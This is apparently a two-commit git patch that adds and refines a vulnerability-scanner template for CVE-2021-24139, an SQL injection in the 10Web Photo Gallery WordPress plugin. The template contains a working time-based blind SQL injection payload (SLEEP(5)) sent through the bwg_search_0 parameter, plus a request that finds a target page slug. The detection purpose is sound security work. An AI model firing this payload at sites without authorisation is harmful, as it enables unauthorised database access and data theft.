From ee5c2d21a7133e80a9c4ed2da932cd46602062b5 Mon Sep 17 00:00:00 2001
From: Ritesh Sahu <118372301+riteshs4hu@users.noreply.github.com>
Date: Thu, 29 Jan 2026 07:45:00 +0530
Subject: [PATCH 1/2] Add CVE-2021-24139

---
 http/cves/2021/CVE-2021-24139.yaml | 54 ++++++++++++++++++++++++++++++
 1 file changed, 54 insertions(+)
 create mode 100644 http/cves/2021/CVE-2021-24139.yaml

diff --git a/http/cves/2021/CVE-2021-24139.yaml b/http/cves/2021/CVE-2021-24139.yaml
new file mode 100644
index 00000000000..99a1f912794
--- /dev/null
+++ b/http/cves/2021/CVE-2021-24139.yaml
@@ -0,0 +1,54 @@
+id: CVE-2021-24139
+
+info:
+  name: 10Web Photo Gallery - SQL Injection
+  author: riteshs4hu
+  severity: critical
+  description: |
+    WordPress plugin 10Web Photo Gallery versions before 1.5.55 contains a SQL injection caused by unvalidated input in the 'bwg_search_x' parameter in frontend/models/model.php, letting attackers execute arbitrary SQL commands, exploit requires attacker to control the 'bwg_search_x' parameter.
+  impact: |
+    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
+  remediation: |
+    Update to version 1.5.55 or later.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery/photo-gallery-by-10web-1554-sql-injection-via-bwg-search-x-parameter
+    - https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-24139
+    cwe-id: CWE-89
+    epss-score: 0.00546
+    epss-percentile: 0.67189
+    cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: 10web
+    product: photo_gallery
+  tags: cve,cve2021,kev,vkev,10web,photo-gallery
+
+http:
+  - raw:
+      - |
+        GET /index.php?rest_route=/wp/v2/pages HTTP/1.1
+        Host: {{Hostname}}
+    
+    extractors:
+      - type: regex
+        name: slug
+        group: 1
+        regex:
+          - '"slug"\s*:\s*"([^"]+)"[\s\S]*?"content"\s*:\s*{\s*"rendered"\s*:\s*".*?bwg-style-0'
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 50s
+        GET /{{slug}}/?bwg_search_0=%22%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F4846%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29UIHp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%22zQgg%22%2F%2A%2A%2FLIKE%2F%2A%2A%2F%22zQgg HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code==200 && duration>=5'

From 5f17582f29ee8af9f9ab4c6197043833835189e8 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Thu, 29 Jan 2026 16:53:31 +0900
Subject: [PATCH 2/2] Update CVE-2021-24139.yaml

---
 http/cves/2021/CVE-2021-24139.yaml | 19 ++++++++++++-------
 1 file changed, 12 insertions(+), 7 deletions(-)

diff --git a/http/cves/2021/CVE-2021-24139.yaml b/http/cves/2021/CVE-2021-24139.yaml
index 99a1f912794..650736bf817 100644
--- a/http/cves/2021/CVE-2021-24139.yaml
+++ b/http/cves/2021/CVE-2021-24139.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-24139
 
 info:
-  name: 10Web Photo Gallery - SQL Injection
+  name: 10Web Photo Gallery < 1.5.55 - SQL Injection
   author: riteshs4hu
   severity: critical
   description: |
@@ -11,8 +11,9 @@ info:
   remediation: |
     Update to version 1.5.55 or later.
   reference:
-    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery/photo-gallery-by-10web-1554-sql-injection-via-bwg-search-x-parameter
     - https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery/photo-gallery-by-10web-1554-sql-injection-via-bwg-search-x-parameter
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24139
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -23,23 +24,26 @@ info:
     cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
-    max-request: 3
+    max-request: 2
     vendor: 10web
     product: photo_gallery
-  tags: cve,cve2021,kev,vkev,10web,photo-gallery
+    publicwww-query: "bwg_container"
+  tags: cve,cve2021,wp,wp-plugin,sqli,photo-gallery,10web
+
+flow: http(1) && http(2)
 
 http:
   - raw:
       - |
         GET /index.php?rest_route=/wp/v2/pages HTTP/1.1
         Host: {{Hostname}}
-    
+
     extractors:
       - type: regex
         name: slug
         group: 1
         regex:
-          - '"slug"\s*:\s*"([^"]+)"[\s\S]*?"content"\s*:\s*{\s*"rendered"\s*:\s*".*?bwg-style-0'
+          - '"slug"\s*:\s*"([^"]+)"[\s\S]*?"content"\s*:\s*{\s*"rendered"\s*:\s*".*?bwg'
         internal: true
 
   - raw:
@@ -51,4 +55,5 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'status_code==200 && duration>=5'
+          - 'duration>=5'
+          - 'status_code==200'